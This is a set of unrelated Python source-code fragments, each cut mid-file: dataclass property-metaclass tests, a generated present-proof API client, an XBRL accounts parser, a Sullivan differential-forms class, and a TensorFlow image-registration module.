return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_underscored_property_and_public_field():
"""
Using `property_wizard` when the dataclass has an underscored property and
a public field name.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
wheels: Union[int, str] = 4
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_underscored_property_and_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name with a leading underscore.
Note: this approach is generally *not* recommended, because the IDE won't
know that the property or field name will be transformed to a public field
name without the leading underscore, so it won't offer the desired type
hints and auto-completion here.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `_wheels` here will be ignored, since `_wheels` is
# simply re-assigned on the following property definition.
_wheels: Union[int, str] = 4
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
# Note that my IDE complains here, and suggests `_wheels` as a possible
# keyword argument to the constructor method; however, that's wrong and
# will error if you try it way.
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_public_property_and_annotated_field():
"""
Using `property_wizard` when the dataclass has both a property and field
name *without* a leading underscore, and the field is a
:class:`typing.Annotated` type.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
wheels: Annotated[Union[int, str], field(default=4)] = None
@property
def wheels(self) -> int:
return self._wheels
@wheels.setter
def wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 4
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_private_property_and_annotated_field_with_no_useful_extras():
"""
Using `property_wizard` when the dataclass has both a property and field
name with a leading underscore, and the field is a
:class:`typing.Annotated` type without any extras that are a
:class:`dataclasses.Field` type.
"""
@dataclass
class Vehicle(metaclass=property_wizard):
# The value of `wheels` here will be ignored, since `wheels` is simply
# re-assigned on the following property definition.
_wheels: Annotated[Union[int, str], 'Hello world!', 123] = None
@property
def _wheels(self) -> int:
return self._wheels
@_wheels.setter
def _wheels(self, wheels: Union[int, str]):
self._wheels = int(wheels)
v = Vehicle()
log.debug(v)
assert v.wheels == 0
v = Vehicle(wheels=3)
log.debug(v)
assert v.wheels == 3
v = Vehicle('6')
log.debug(v)
assert v.wheels == 6, 'The constructor should use our setter method'
v.wheels = '123'
assert v.wheels == 123, 'Expected assignment to use the setter method'
def test_property_wizard_with_multiple_inheritance():
"""
When using multiple inheritance or when extending from more than one
class, and if any of the super classes define properties that should also
be `dataclass` fields, then the recommended approach is to define the
`property_wizard` metaclass on each class that has such properties. Note
that the last class in the below | |
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V10PresentationExchangeList
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
return self.present_proof_records_get_endpoint.call_with_http_info(**kwargs)
def present_proof_records_pres_ex_id_credentials_get(self, pres_ex_id, **kwargs):
"""Fetch credentials for a presentation request from wallet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_credentials_get(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
count (str): Maximum number to retrieve. [optional]
extra_query (str): (JSON) object mapping referents to extra WQL queries. [optional]
referent (str): Proof request referents of interest, comma-separated. [optional]
start (str): Start index. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[IndyCredPrecis]
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return self.present_proof_records_pres_ex_id_credentials_get_endpoint.call_with_http_info(
**kwargs
)
def present_proof_records_pres_ex_id_delete(self, pres_ex_id, **kwargs):
"""Remove an existing presentation exchange record # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_delete(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return (
self.present_proof_records_pres_ex_id_delete_endpoint.call_with_http_info(
**kwargs
)
)
def present_proof_records_pres_ex_id_get(self, pres_ex_id, **kwargs):
"""Fetch a single presentation exchange record # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_get(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V10PresentationExchange
If the method is called asynchronously, returns the request
thread.
"""
kwargs["async_req"] = kwargs.get("async_req", False)
kwargs["_return_http_data_only"] = kwargs.get("_return_http_data_only", True)
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
kwargs["pres_ex_id"] = pres_ex_id
return self.present_proof_records_pres_ex_id_get_endpoint.call_with_http_info(
**kwargs
)
def present_proof_records_pres_ex_id_problem_report_post(
self, pres_ex_id, **kwargs
):
"""Send a problem report for presentation exchange # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.present_proof_records_pres_ex_id_problem_report_post(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
body (V10PresentationProblemReportRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
| |
<gh_stars>0
from bs4 import BeautifulSoup as BS # Can parse xml or html docs
from datetime import datetime
from dateutil import parser
from src.data_processing.xbrl_pd_methods import XbrlExtraction
import pandas as pd
import os
import csv
import time
import sys
import math
import time
import multiprocessing as mp
import numpy as np
class XbrlParser:
""" This is a class for parsing the XBRL data."""
def __init__(self):
"""
Constructs all the necessary attributes for the XbrlParser object of
which there are none.
"""
self.__init__
# Table of variables and values that indicate consolidated status
consolidation_var_table = {
"includedinconsolidationsubsidiary": True,
"investmententityrequiredto\
applyexceptionfromconsolidationtruefalse": True,
"subsidiaryunconsolidatedtruefalse": False,
"descriptionreasonwhyentityhasnot\
preparedconsolidatedfinancialstatements": "exist",
"consolidationpolicy": "exist"
}
@staticmethod
def clean_value(string):
"""
Take a value that is stored as a string, clean it and convert to
numeric. If it's just a dash, it is taken to mean zero.
Arguments:
string: string to be cleaned and converted (str)
Returns:
string: cleaned string converted to numeric (int)
Raises:
None
"""
if string.strip() == "-":
return 0.0
try:
return float(string.strip().replace(",", "").replace(" ", ""))
except:
pass
return string
@staticmethod
def retrieve_from_context(soup, contextref):
"""
Used where an element of the document contained no data, only a
reference to a context element.
Finds the relevant context element and retrieves the relevant data.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
contextref: id of the context element to be raided
Returns:
contents: relevant data from the context (string)
"""
try:
context = soup.find("xbrli:context", id=contextref)
contents = context.find("xbrldi:explicitmember").get_text()\
.split(":")[-1].strip()
except:
contents = ""
return contents
@staticmethod
def retrieve_accounting_standard(soup):
"""
Gets the account reporting standard in use in a document by hunting
down the link to the schema reference sheet that always appears to
be in the document, and extracting the format and standard date from
the string of the url itself.
WARNING - That means that there's a lot of implicit hardcoded info
on the way these links are formatted and referenced within this
function. Might need changing someday.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
Returns:
standard: The standard for the object (string)
date: The date for the object (string)
original_url: The original url of the object (string)
Raises:
None
"""
# Find the relevant link by its unique attribute
link_obj = soup.find("link:schemaref")
# If we didn't find anything it's an xml doc using a different
# element name:
if link_obj == None:
link_obj = soup.find("schemaref")
# extract the name of the .xsd schema file, which contains format
# and date information
text = link_obj['xlink:href'].split("/")[-1].split(".")[0]
# Split the extracted text into format and date, return values
standard, date, original_url = \
text[:-10].strip("-"), text[-10:], link_obj['xlink:href']
return standard, date, original_url
@staticmethod
def retrieve_unit(soup, each):
"""
Gets the reporting unit by trying to chase a unitref to
its source, alternatively uses element attribute unitref
if it's not a reference to another element.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
each: element of BeautifulSoup souped object
Returns:
unit_str: the unit of the element (string)
Raises:
None
"""
# If not, try to discover the unit string in the soup object
try:
unit_str = soup.find(id=each['unitref']).get_text()
except:
# Or if not, in the attributes of the element
try:
unit_str = each.attrs['unitref']
except:
return "NA"
return unit_str.strip()
@staticmethod
def retrieve_date(soup, each):
"""
Gets the reporting date by trying to chase a contextref
to its source and extract its period, alternatively uses
element attribute contextref if it's not a reference
to another element.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
each: element of BeautifulSoup souped object
Returns:
date_val: The reporting date of the object (date)
Raises:
None
"""
# Try to find a date tag within the contextref element, starting with
# the most specific tags, and starting with those for ixbrl docs as
# it's the most common file.
date_tag_list = ["xbrli:enddate",
"xbrli:instant",
"xbrli:period",
"enddate",
"instant",
"period"]
for tag in date_tag_list:
try:
date_str = each['contextref']
date_val = parser.parse(soup.find(id=each['contextref']).
find(tag).get_text()).date()\
.isoformat()
return date_val
except:
pass
try:
date_str = each.attrs['contextref']
date_val = parser.parse(each.attrs['contextref']).date().\
isoformat()
return date_val
except:
pass
return "NA"
@staticmethod
def parse_element(soup, element):
"""
For a discovered XBRL tagged element, go through, retrieve its name
and value and associated metadata.
Arguments:
soup: BeautifulSoup object of accounts document (BeautifulSoup object)
element: soup object of discovered tagged element
Returns:
element_dict: A dictionary containing the elements name value and
metadata (dict)
Raises:
None
"""
if "contextref" not in element.attrs:
return {}
element_dict = []
# Basic name and value
try:
# Method for XBRLi docs first
element_dict['name'] = element.attrs['name'].lower().split(":")[-1]
except:
# Method for XBRL docs second
element_dict['name'] = element.name.lower().split(":")[-1]
element_dict['value'] = element.get_text()
element_dict['unit'] = XbrlParser.retrieve_unit(soup, element)
element_dict['date'] = XbrlParser.retrieve_date(soup, element)
# If there's no value retrieved, try raiding the associated context
# data
if element_dict['value'] == "":
element_dict['value'] = XbrlParser.retrieve_from_context(
soup, element.attrs['contextref'])
# If the value has a defined unit (eg a currency) convert to numeric
if element_dict['unit'] != "NA":
element_dict['value'] = XbrlParser.clean_value(
element_dict['value'])
# Retrieve sign of element if exists
try:
element_dict['sign'] = element.attrs['sign']
# if it's negative, convert the value then and there
if element_dict['sign'].strip() == "-":
element_dict['value'] = 0.0 - element_dict['value']
except:
pass
return element_dict
@staticmethod
def parse_elements(element_set, soup):
"""
For a set of discovered elements within a document, try to parse
them. Only keep valid results (test is whether field "name" exists).
Arguments:
element_set: BeautifulSoup iterable search result object (list of BeautifulSoup objects)
soup: BeautifulSoup object of accounts document (BeautifulSoup object)
Returns:
elements: A list of dicts corresponding to the elements of
element_set (list)
Raises:
None
"""
element_dict = {'name': [], 'value': [], 'unit': [],
'date': [], 'sign': []}
for i,element in enumerate(element_set):
if "contextref" not in element.attrs:
return {}
# Basic name and value
try:
# Method for XBRLi docs first
element_dict['name'].append(element.attrs['name'].lower().split(":")[-1])
except:
# Method for XBRL docs second
element_dict['name'].append(element.name.lower().split(":")[-1])
element_dict['value'].append(element.get_text())
element_dict['unit'].append(XbrlParser.retrieve_unit(soup, element))
element_dict['date'].append(XbrlParser.retrieve_date(soup, element))
# If there's no value retrieved, try raiding the associated context
# data
if element_dict['value'][i] == "":
element_dict['value'][i] = XbrlParser.retrieve_from_context(
soup, element.attrs['contextref'])
# If the value has a defined unit (eg a currency) convert to numeric
if element_dict['unit'][i] != "NA":
element_dict['value'][i] = XbrlParser.clean_value(
element_dict['value'][i])
# Retrieve sign of element if exists
try:
element_dict['sign'].append(element.attrs['sign'])
# if it's negative, convert the value then and there
if element_dict['sign'][i].strip() == "-":
element_dict['value'][i] = 0.0 - element_dict['value'][i]
except:
pass
return element_dict
@staticmethod
def summarise_by_sum(doc, variable_names):
"""
Takes a document (dict) after extraction, and tries to extract
a summary variable relating to the financial state of the enterprise
by summing all those named that exist.
Arguments:
doc: an extracted document dict, with "elements" entry
as created by the 'scrape_clean_elements' functions
(dict)
variable_names: variables to find and sum (of all) if they exist
Returns (as a dict):
total_assets: the totals of the given values
units: the units corresponding to the given sum
"""
# Convert elements to pandas df
df = pd.DataFrame(doc['elements'])
# Subset to most recent (latest dated)
df = df[df['date'] == doc['doc_balancesheetdate']]
total_assets = 0.0
unit = "NA"
# Find the total assets by summing components
for each in variable_names:
# Fault-tolerant, will skip whatever isn't numeric
try:
total_assets = total_assets + df[df['name'] == each]\
.iloc[0]['value']
# Retrieve reporting unit if exists
unit = df[df['name'] == each].iloc[0]['unit']
except:
pass
return {"total_assets": total_assets, "unit": unit}
@staticmethod
def summarise_by_priority(doc, variable_names):
"""
Takes a document (dict) after extraction, and tries to extract
a summary variable relating to the financial state of the enterprise
by looking for each named, in order.
Arguments:
doc: an extracted document dict, with "elements" entry
as created by the 'scrape_clean_elements' functions
(dict)
variable_names: variables to find and check if they exist
Returns (as a dict):
primary_assets: total assets from given variables
unit: units for corresponding assets
Raises:
None
"""
# Convert elements to pandas df
df = pd.DataFrame(doc['elements'])
# Subset to most recent (latest dated)
df = df[df['date'] == doc['doc_balancesheetdate']]
primary_assets = 0.0
unit = "NA"
# Find the net asset/liability variable by hunting names in order
for each in variable_names:
try:
# | |
i in m.split('|')]
# zero polynomial on restriction
if len([i for i, e in enumerate(split_m) \
if e > 0 and i not in f]) > 0:
continue
out_m = [e for i, e in enumerate(split_m) if i in f]
out_m = '|'.join([str(i) for i in out_m])
out_p[out_m] = c
# map dt to range of f
out_form['|'.join([str(f[i]) for i in split_dt])] = out_p
return SullivanForm(out_n, out_form)
raise Exception('to be implemented')
return SullivanForm(m, out_form)
def p(self):
# initialize output form as 0
out_n = self.n
out_form = duf.DupontForm(out_n, {'': 0})
# for each dt, we integrate and add the result to the output form
for dt, p in self.form.items():
# in case there is no dt (ie: just a polynomial): evaluation at
# the vertices
if dt == '':
aux_duf = [duf.DupontForm(out_n, {'': 0})]
for m, c in p.items():
split_m = [int(e) for e in m.split('|')]
# loop through vertices of the simplex
n_nonzero, v_nonzero = 0, -1
for v, e in enumerate(split_m):
if e > 0:
n_nonzero += 1
v_nonzero = v
# if more than one are non-zero, then we get zero
if n_nonzero > 1:
continue
elif n_nonzero == 0:
aux_duf.append(
duf.DupontForm(
out_n,
{'': c}
)
)
else:
aux_duf.append(
duf.DupontForm(
out_n,
{str(v_nonzero): c}
)
)
aux_duf = sum(aux_duf)
out_form += aux_duf
# otherwise, for proper forms
else:
aux_duf = [duf.DupontForm(out_n, {'': 0})]
split_dt = [int(i) for i in dt.split('|')]
# we consider all the sub-simplices of dimension where dt could
# integrate to something
for f in it.combinations(range(out_n+1), len(split_dt) + 1):
# dt needs to cover all coordinates except one
if len([i for i in f if i not in split_dt]) != 1:
continue
# f as map from image to range
f = {j: i for i, j in enumerate(f)}
# pullback form
pbf = SullivanForm(out_n, {dt: p}).pullback(f)
# skip if pullback is zero
if pbf.is_zero:
continue
# integrate the polynomial
int_poly = 0
# pullback of dt
pb_dt = '|'.join([str(f[i]) for i in split_dt])
sign = [(-1)**i for i in range(pbf.n + 1) \
if i not in [f[j] for j in split_dt]][0]
for m, c in pbf.form[pb_dt].items():
split_m = [int(e) for e in m.split('|')]
int_poly += sign * c * \
np.product([math.factorial(e) for e in split_m])/ \
math.factorial(sum(split_m) + pbf.n)
# add resulting form
aux_duf.append(
duf.DupontForm(
out_n,
{'|'.join([str(i) for i in f]): int_poly}
)
)
aux_duf = sum(aux_duf)
out_form += aux_duf
return out_form
def d(self):
"""
Differential.
"""
out_n = self.n
out_form = SullivanForm.zero(out_n)
for dt, p in self.form.items():
for m, c in p.items():
# d(monomial)
split_m = [int(e) for e in m.split('|')]
for i, e in enumerate(split_m):
if e == 0:
continue
aux_split_m = [*split_m]
aux_split_m[i] -= 1
aux_m = '|'.join([str(x) for x in aux_split_m])
aux_c = c * e
if dt == '':
aux_dt = str(i)
else:
aux_dt = f"{i}|{dt}"
# add term to final form
out_form += SullivanForm(
out_n,
{aux_dt: {aux_m: aux_c}}
)
return out_form
def apply_permutation(self, permutation):
"""
Action of permutation on a form (mapping t_i to t_permutation(i)).
Permutation given as a dictionary, an be only partial in which case it
is automatically completed with identity in all missing values.
Eg: {1: 2, 2: 1} is the switch (1 2).
Parameters
----------
permutation : dict
Permutation to apply.
Returns
-------
SullivanForm
Permuted form.
"""
# complete permutation
for i in range(self.n + 1):
if i not in permutation:
permutation[i] = i
# inverse permutation
permutation_inv = {j: i for i, j in permutation.items()}
out_n = self.n
out_form = {}
for dt, p in self.form.items():
# permute dt
if dt == '':
dt_split = []
else:
dt_split = [int(i) for i in dt.split('|')]
aux_dt = [str(permutation[i]) for i in dt_split]
aux_dt = '|'.join(aux_dt)
aux_p = {}
for m, c in p.items():
# permute t
m_split = [int(e) for e in m.split('|')]
aux_m = [str(m_split[permutation_inv[i]]) \
for i in range(out_n + 1)]
aux_m = '|'.join(aux_m)
aux_p[aux_m] = c
out_form[aux_dt] = aux_p
return SullivanForm(out_n, out_form)
def reduce(self, eliminate=0):
"""
Simplify the form by eliminating all occurrences of t_[eliminate].
Parameters
----------
eliminate : int, optional
The t to eliminate from the expression. The default is 0.
Returns
-------
SullivanForm
Simplified form.
"""
out_n = self.n
# first reduce the dt
temp_form = SullivanForm.zero(out_n)
for dt, p in self.form.items():
if dt == '':
dt_split = []
else:
dt_split = [int(i) for i in dt.split('|')]
if eliminate not in dt_split:
temp_form += SullivanForm(out_n, {dt: p})
else:
i_elim = dt_split.index(eliminate)
aux_form = {}
for i in range(out_n + 1):
if i in dt_split: # either eliminate or already occurring
continue
aux_dt = [*dt_split]
aux_dt[i_elim] = i
aux_dt = '|'.join([str(j) for j in aux_dt])
aux_form[aux_dt] = p
# notice the minus sign
aux_form = -SullivanForm(out_n, aux_form)
temp_form += aux_form
# then reduce the polynomials
# probably not optimal, but the easiest and clearest way of
# implementing it
# t_eliminate = 1 - t_0 - ... - t_n () only t_eliminate not appearing
# on the right-hand side)
replacement_poly = {
'|'.join([str(int(j == i)) for j in range(out_n + 1)]): -1 \
for i in range(out_n + 1) if i != eliminate
}
replacement_poly['|'.join(['0']*(out_n + 1))] = 1
replacement_poly = SullivanForm(out_n, {'': replacement_poly})
# replace occurrences of t_eliminate with the replacement polynomial
out_form = SullivanForm.zero(out_n)
for dt, p in temp_form.form.items():
for m, c in p.items():
m_split = [int(e) for e in m.split('|')]
# exponent of t_eliminate
exponent_elim = m_split[eliminate]
if exponent_elim == 0:
out_form += SullivanForm(out_n, {dt: {m: c}})
else:
aux_m = m_split
aux_m[eliminate] = 0
aux_m = '|'.join([str(i) for i in aux_m])
aux_form = SullivanForm(out_n, {dt: {aux_m: c}})
for _ in range(exponent_elim):
aux_form *= replacement_poly
out_form += aux_form
return out_form
def __eq__(self, other):
"""
Check for equality of Sullivan forms. We use the fact that by reducing
away t_0 we get a representation in the commutative algebra
Q[t_1,...,t_n,dt1,...dt_n] and thus we need only compare coefficients.
Warning: this applies reduce() to both self and other.
"""
self = self.reduce()
other = other.reduce()
for dt, p in self.form.items():
if dt not in other.form:
return False
for m, c in p.items():
if m not in other.form[dt] or c != other.form[dt][m]:
return False
for dt, p in other.form.items():
if dt not in self.form:
return False
for m, c in p.items():
if m not in self.form[dt] or c != self.form[dt][m]:
return False
return True
def hj(self, j):
"""
Implement the auxiliary function h_j (Lunardon, p.7) which will then
be used for the contraction.
Parameters
----------
j : int
DESCRIPTION.
Returns
-------
SullivanForm.
"""
if j != 0:
# reduce to the case j = 0
out_form = self.apply_permutation({0: j, j: 0})
out_form = out_form.hj(0)
return out_form.apply_permutation({0: j, j: 0})
# case j = 0
out_n = self.n
# first eliminate t_0 from the expression
aux_form = self.reduce()
# there is an easy formula for a form written as
# x1^k1...xn^kn dt_c1 dt_c2 ... dt_cm with 1 < c1 < c2 < ... < cm,
# see Lunardon, p. 12
out_form = SullivanForm.zero(out_n)
for dt, p in aux_form.form.items():
if dt == '':
# in this case we get 0 for the monomial
continue
else:
dt_split = [int(i) for i in dt.split('|')]
for m, c in p.items():
m_split = [int(e) for e in m.split('|')]
aux_c = c / (sum(m_split) + len(dt_split))
for i, k in enumerate(dt_split):
aux_dt | |
import matplotlib.pyplot as plt
import numpy as np
from scipy.linalg import expm,logm
import tensorflow as tf
import vis
import os
import argparse
import nibabel as nib
import warnings
import scipy.interpolate as spi
'''
In this file we include several basic functions that were not present natively in tensorflow,
and we implement the algorithm for image registration with intensity transformation and missing data.
The basic functions implemented are:
interp3: trilinear interpolation for deforming images and vector fields
grad3: computes the 3D gradient of a function
down: downsamples images by averaging over a rectangular neighborhood
down2: a faster downsampling version for downsampling by 2
upsample: upsample data by zero padding in the Fourier domain. This is necessary for upsampling
lddmm velocity fields without changing the regularization energy.
transform_data: applies the calcuated deformation fields to image data
affine_transform_data: applies an affine transformation to data with a simpler interface
orientation_to_matrix: computes transformation matrices that relate images of different orientations.
For example 'LAS' denotes Left-Anterior-Superior, which means the first image axis
contains data from right to left, the second from posterior to anterior,
and the third from inferior to superior.
Next, the lddmm algorithm is implemented in two parts in the function 'lddmm'.
In the first part a tensorflow computatoin graph is defined that applies
an existing deformation to images and calculates a cost function gradient.
In the second part, these calculations are performed on data and optimization is carried out.
Finally, a basic command line interface is implemented.
'''
dtype = tf.float32
idtype = tf.int64
def interp3(x0,x1,x2,I,phi0,phi1,phi2,method=1,image_dtype=dtype):
'''
Linear interpolation
Interpolate a 3D tensorflow image I
with voxels corresponding to locations in x0, x1, x2 (1d np arrays)
at the points phi0, phi1, phi2 (3d arrays)
Note optional method:
0 for nearest neighbor,
1 for trilinear (default)
Note optional dtype:
you may want to set it to idtype when doing nearest interpolation for label images
Output is the image I transformed by interpolation.
'''
if method != 0 and method != 1:
raise ValueError('method must be 0 (nearest neighbor) or 1 (trilinear)')
I = tf.convert_to_tensor(I, dtype=image_dtype)
phi0 = tf.convert_to_tensor(phi0, dtype=dtype)
phi1 = tf.convert_to_tensor(phi1, dtype=dtype)
phi2 = tf.convert_to_tensor(phi2, dtype=dtype)
# get the size
dx = [x0[1]-x0[0], x1[1]-x1[0], x2[1]-x2[0]]
nx = [len(x0), len(x1), len(x2)]
shape = tf.shape(phi0)
nxout = [shape[0],shape[1],shape[2]]
#convert to index
phi0_index = (phi0 - x0[0])/dx[0]
phi1_index = (phi1 - x1[0])/dx[1]
phi2_index = (phi2 - x2[0])/dx[2]
if method == 0: # simple hack for nearest neighbor, weights should all be binary now
phi0_index = tf.round(phi0_index)
phi1_index = tf.round(phi1_index)
phi2_index = tf.round(phi2_index)
# take the floor to get integers
phi0_index_floor = tf.floor(phi0_index)
phi1_index_floor = tf.floor(phi1_index)
phi2_index_floor = tf.floor(phi2_index)
# get the fraction to the next pixel
phi0_p = phi0_index - phi0_index_floor
phi1_p = phi1_index - phi1_index_floor
phi2_p = phi2_index - phi2_index_floor
# now convert to int and work with ints, otherwise I ended up with loss of precision
phi0_index_floor = tf.cast(phi0_index_floor,dtype=idtype)
phi1_index_floor = tf.cast(phi1_index_floor,dtype=idtype)
phi2_index_floor = tf.cast(phi2_index_floor,dtype=idtype)
# get the next samples
phi0_index_floor_1 = phi0_index_floor+1
phi1_index_floor_1 = phi1_index_floor+1
